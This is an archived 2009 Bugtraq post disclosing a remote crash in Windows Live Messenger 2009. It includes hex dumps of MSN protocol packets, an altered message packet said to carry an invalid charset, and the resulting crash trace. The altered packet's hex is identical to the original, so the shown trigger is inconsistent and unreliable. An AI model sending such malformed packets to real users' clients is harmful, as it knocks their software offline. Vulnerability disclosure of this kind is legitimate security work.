RE: hello bug in windows live messenger

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: RE: hello bug in windows live messenger
From: rasod korad <r00tback@xxxxxxxxx>
Date: Wed, 18 Feb 2009 10:56:13 -0800 (PST)
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1234983374; bh=ueKkWiblZ2kyzrk5oUN27xr8KZwGKGlk8hPo2azu62o=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=15Kk0iisZpKovXQTGxrHPZIoOPeBiVyd1fcOtuVkgUR4tMUTT6ez3qPJdRDPo4zbPYILsq927uxRZaw645pSmiUtDkkmfvK/q7oDZ2KTS32Ccx+vQsYJI1gHSLmOoiR5JsW/xcnJG5RyLMwWO1XlUlpp3APmueO7Kk7S96Y/Jy8=
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=sVhITqfyv7Ft/tX8JdZOJIxx/IuOcmepiFB0dWFYuBbY+LNZBmQXRkMvvmUwm0YHnQ8ECVs1AVsxf9uTru5HsIr5l7Mafr6qA8SWbB+gHOM1s0MZ9gGKeknF8/QnWiYfjJI/CqhjRMVQ2kTFfH1ztAj/KB48V5ZByle+wXQa4BA=;
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Author :    Microsoft 
Affected Software :   Windows Live Messenger Version 2009 (build 14.0.8064.XXX)
Discovered by : Mr Ha1 : Morad Quraan
Date : 16/2/2009
Greats to : Toto , Xprincezuman , Ahmad Mars , Aousq , Navelove ;)
MSN : webmaster@xxxxxxxxxxxxxxxxxx
---- ------- ----- --------- ------- ------- ------ ------


i found Remote Denial of Service Lead WLM to Crash when you
 Change the Chartset of Msg you send to something not found 

{this packets sent form your pc when u try to send instant msg via msn}

Example :
1  192.168.1.100:2038  64.4.34.31:1863  11  Send  
0000  58 46 52 20 32 32 20 53 42 0D 0A                   XFR 22 SB..

2  192.168.1.100:2229  64.4.37.43:1863  104  Send  
0000  55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72    USR 79 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E    @arabicsecurity.
0020  63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45    com;{252BF068-8E
0030  46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34    F5-4031-865B-6E4
0040  44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33    D1B578C9A} 46233
0050  39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 34    9538.21021539.24
0060  32 31 38 33 36 37 0D 0A                            218367..

3  192.168.1.100:2229  64.4.37.43:1863  37  Send  
0000  43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72    CAL 76 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E    @arabicsecurity.
0020  63 6F 6D 0D 0A                                     com..

4  192.168.1.100:2229  64.4.37.43:1863  33  Send  
0000  43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5F    CAL 77 hack_any_
0010  6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0D    one@xxxxxxxxxxxx
0020  0A                                                 .

5  192.168.1.100:2229  64.4.37.43:1863  146  Send  
0000  4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49    MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D    ME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74    .Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73    ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D    et=UTF-8..X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72    IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65    abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B    nt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A     CS=b2; PF=2....
0090  68 69                                              hi

if we changed the last packet number 5 to :

5  192.168.1.100:2229  64.4.37.43:1863  146  Send  
0000  4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49    MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D    ME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74    .Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73    ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D    et=UTF-8.0.X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72    IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65    abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B    nt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A     CS=b2; PF=2....
0090  68 69                                              hi


and resend the instant msg again to the target WLM will crash with this error :

AppName: msnmsgr.exe     AppVer: 14.0.8064.206   ModName: msvcr80.dll
ModVer: 8.0.50727.1433   Offset: 0000faa3

poc code made and its not open source coz its patched version of messenger if u 
want it tell me how to give it to u

Prev by Date: DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability
Next by Date: [ MDVSA-2009:042 ] samba
Previous by thread: DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability
Next by thread: [ MDVSA-2009:042 ] samba
Index(es):
- Date
- Thread